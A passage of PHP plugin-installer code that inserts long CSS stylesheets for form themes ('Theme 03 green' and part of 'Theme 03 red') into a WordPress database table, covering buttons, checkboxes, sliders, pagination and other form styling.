pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #CEECE2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #95D3BE ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #80CEB4 ), color-stop(49%, #95D6C1 ), color-stop(84%, #95D3BE ), color-stop(99%, #B3E7D6 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #E0DFE0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 03 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #3A620A;\r\nmargin-bottom: 10px;\r\ncolor: #3A620A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\n	background: #3A620A;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #fff;\r\n	border: 2px solid #4A8C08;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #44740E;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #CDD9C3;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #42810e;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #36690c;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #62983A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #61b217), color-stop(39%, #62983a), color-stop(100%, #62983a)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #61b217 0%, #62983a 39%, #62983a 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/01/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 03 red\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #811919;\r\nmargin-bottom: 10px;\r\ncolor: #811919;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #5D0000 !important;\r\n	color: 